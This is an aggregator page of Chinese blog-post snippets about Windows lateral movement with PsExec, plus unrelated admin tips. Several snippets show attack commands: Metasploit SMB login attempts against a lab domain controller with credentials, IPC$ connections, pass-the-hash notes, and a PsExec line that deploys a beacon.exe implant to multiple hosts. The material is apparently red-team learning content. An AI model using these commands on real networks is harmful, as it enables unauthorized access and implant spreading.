ICode9

精准搜索请尝试: 精确搜索
  • 关闭windows计划重启2022-07-04 18:04:54

    前言 windows 总是自动计划更新 解决方案 需要禁用服务 “Windows Update” 和 “更新 Orchestrator 服务” 首先去这里下载PsTools。 将 PsExec.exe 解压缩到桌面上 然后使用管理员权限打开 cmd 命令行 进入到桌面文件夹 cd \Users\%username%\Desktop 执行打开任务计划程序 P

  • 内网横向渗透 之 ATT&CK系列一 之 拿下域控制器2022-05-12 13:31:26

    信息收集 信息收集 域控制器的相关信息: 通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功 1 search smb_login 2 use 0 3 set rhosts 192.168.52.138 4 set smbpass hongrisec@2022 5 set smbuser Administrator 6 set smbdomain GOD

  • 域内横向移动基础2022-04-16 22:35:40

    利用Windwos远程连接 IPC IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。 建立IPC连接 有域的话一定得带上 net use \\1.1.1.3\ipc$ /user:w2k3\administrator "1" 输入net use即可看到建立的连接 常用的命令 //映射磁盘到本地 n

  • 21.横向移动工具——Psexec、wimexec2022-01-22 21:04:33

    Psexec     一、利用条件:   1、具有正确的凭证(内存凭证、账号密码、账号NTLM Hash) 2、能建立IPC链接(也就是需要通过smb认证的),且目标机器开启了共享(默认开启的),并且目标共享中必须有admin$共享   二、优缺点   优点:可以直接获取SYSTEM权限的半互式shell 缺点:利用时会产生一个Ps

  • 内网横向移动之:PSExec2021-11-14 16:30:46

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PSExec PSExec 原理: 通过管道在远程目标主机上创建一个 PSExec 服务,并在

  • 基于admin$共享的横向移动—psexec2021-11-12 17:02:38

    目录 psexec psexec原理 psexec使用前提 psexec横向移动 msf中的psexec psexec psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火

  • psexec的底层实现原理是什么2021-11-11 10:02:13

    讲在前面 我们在这里学习的是sysinternals工具包中的psexec.exe。本文对于psexec.exe的实现具体理论技术不做赘述,国内外已有优秀的博客对此做了非常详细的解释(本文借鉴国内已有的文章)。本文从实际出发,复述psexec在实现上需要了解的几个重点知识,至于重点知识是否需要深入了解,读

  • 67:内网安全-域横向smb&wmi明文或hash传递2021-10-11 16:32:40

    思维导图 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WM

  • 安装SQLServer报1402的错,无法打开UNKNOWN\Components 没有访问注册表的权限2021-08-10 13:33:26

    安装SQLServer2019的时候遇到了下列错误 无法打开项 UNKNOWN\Components\7ABFE44842C12B390AF18C3B9B1A1EE8\54D21D49F3A8C1C49AC11A1B6445A83E。系统错误 5。  请验证您是否具有足够的权限访问该项,或者与技术支持人员联系。 尝试了网上最多的方法:1.管理员运行命令提示符 seced

  • 内网------不出网批量上线2021-06-18 14:03:12

    先将可出网的一台机设置中转        生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令 PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\Windows\Temp\beacon.exe        在上线成功的机子上可以看到是通

  • 玩转PowerShell第二节——【利用PsExec进行远程调用】-技术&分享2021-04-19 12:57:04

    PowerShell用的最多的地方就是远程调用,在远程机器上执行脚本,监控远程机器的状态,如NLB状态,EventLog,SqlServer DataBase状态等。 本篇将讲到用PsExec.exe这个工具进行远程调用。概述  PowerShell用的最多的地方就是远程调用,在远程机器上执行脚本,监控远程机器的状态,如NLB状态,Event

  • 了解PSexec2021-03-28 21:34:52

    PSExec允许用户连接到远程计算机并通过命名管道执行命令。命名管道是通过一个随机命名的二进制文件建立的,该文件被写入远程计算机上的ADMIN $共享,并被SVCManager用来创建新服务。 您可以想象此步骤正在运行:sc create [serviceName] binPath= "C:\Windows\[uploaded-binary].exe"

  • nginx windows下重新加载配置2020-11-19 02:01:33

    运行过程中,有个节点部分服务出现故障,像将其下线修复, 使用nginx -t; nginx -s reload 重新加载配置 得到错误"nginx: [error] OpenEvent("Global\ngx_reload_1868") failed (5: Access is denied)" 原因是 nginx 作为windows 服务在运行,安全性问题,不能执行 使用 psexec 执行

  • 内网横向移动常见方法2020-11-14 15:02:24

    最近事情积压太多,想要做些什么,却不知从哪里开始 索性啥也不干了,来,你尽管来,我就整理(水)一下内网渗透横向移动常见的方法来happy一下吧  横向移动,根据定义是指获取内网某台机器的控制权之后,以被攻陷主机为跳板,通过搜集域内凭证,找办法访问到域内其他机器,再依次循环往复,直到获得域

  • msf smb/psexec_command模块无法回显非ASCII编码问题2020-01-16 20:08:02

    如果我们想把输出重定向到文件中就要这样写,在windows操作系统中>、&都属于特殊字符,需要使用^进行转义,这里我们选择使用非阻塞命令连接符,也就是一个&(主要是为了进行命令的截断操作),这样执行的命令,回显是whoami的回显,根据前面一条命令的实际执行情况,C:\Windows\Temp\unidrvs.tx

  • psexec远程重启服务器2019-09-06 17:01:14

    1 使受控机器支持远程psexec 管理 暂参照其他教程   2 打开远程命令行      3 重启服务执行net命令 停止远程桌面 net stop termservice启动远程桌面net start termservice重启机器shutdown /r /f  

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有